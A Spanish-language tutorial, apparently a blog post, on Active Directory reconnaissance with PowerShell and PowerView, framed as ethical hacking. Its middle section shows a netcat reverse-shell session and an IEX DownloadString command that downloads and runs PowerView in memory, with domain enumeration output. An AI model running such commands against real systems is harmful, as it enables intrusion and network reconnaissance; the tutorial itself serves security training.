Enumeracion con PowerShell ofensivo

Utilizando PowerShell, los atacantes pueden recopilar sigilosamente datos internos de los usuarios y explotarlos.

Los ciberdelincuentes aprovechan PowerShell para ejecutar malware sin archivos. Estos archivos no binarios residen en la memoria y les permiten inyectar cargas útiles en aplicaciones en ejecución o mediante secuencias de comandos. Los scripts de entrega de carga útil casi siempre se ejecutan, ya que PowerShell es una aplicación confiable y ampliamente implementada. Además, la integración profunda de Windows de PowerShell y la capacidad de acceder a todas las partes de un host a través del marco .NET brindan a los malos actores la cobertura mejorada que necesitan para eludir los controles de seguridad tradicionales y violar las redes.

En conclusión, powerShell es una poderosa herramienta de post-explotacion que permite a los auditores de seguridad explorar una gran superficie de ataque y explotar muchas posibilidades de ataque.

Introducción a PowerView

PowerView, desarrollada por Will Schroeder, es una herramienta que utiliza la función de dominio de Windows para recopilar información sobre una red y sus usuarios. Todas las opciones de la herramienta envían solicitudes legítimas que pueden ejecutarse en el contexto de los derechos de un usuario de dominio.

Enlace de descarga de PowerView.ps1:

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

Para importar el script en memoria, podemos ejecutar los siguientes comandos:

kqli@kali=> nc -nvlp 443                                                                                           
listening on [any] 443 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 37208
Windows PowerShell running as user WEBSERVER$ on WEBSERVER
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')
PS C:\windows\system32\inetsrv> Get-NetDomain

Forest                  : spartancybersec.corp
DomainControllers       : {First-DC.spartancybersec.corp}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  : 
PdcRoleOwner            : First-DC.spartancybersec.corp
RidRoleOwner            : First-DC.spartancybersec.corp
InfrastructureRoleOwner : First-DC.spartancybersec.corp
Name                    : spartancybersec.corp

En la evidencia previa, podemos apreciar la ejecuccion exitosa de Get-NetDomain.

Te recomendamos usar Guia de comandos de PowerView.ps1

La clave de una buena auditoria esta en la enumeracion

La enumeración es un paso crucial en la fase de reconocimiento de un ataque o una evaluación de seguridad. Con esta información, un atacante o hacker ético puede planificar y ejecutar ataques más efectivos y dirigidos.

A continuacion, te relacionamos algunos ejemplos de posibles vulnerabilidades que podrias encontrar al realizar una buena enumeracion en AD:

• Al enumerar usuarios, un atacante podría descubrir un usuario llamado "backupadmin" y decidir que es un objetivo valioso debido a su posible acceso a backups críticos.

• Al enumerar computadoras, un atacante podría identificar un servidor llamado "HR-DB-Server", lo que indica que podría almacenar información valiosa del departamento de recursos humanos.

• Al listar grupos, podrían encontrarse grupos como "IT-Admins" o "Finance-Privileged", que, si se comprometen, podrían otorgar acceso a áreas críticas.

• Al revisar GPOs, un atacante podría identificar scripts de inicio que están mal configurados y que podrían ser explotados para ejecutar código malicioso.

• Al inspeccionar ACLs, podrían descubrirse configuraciones que otorgan permisos de escritura a usuarios normales en directorios que no deberían, permitiendo posibles ataques de escalada de privilegios.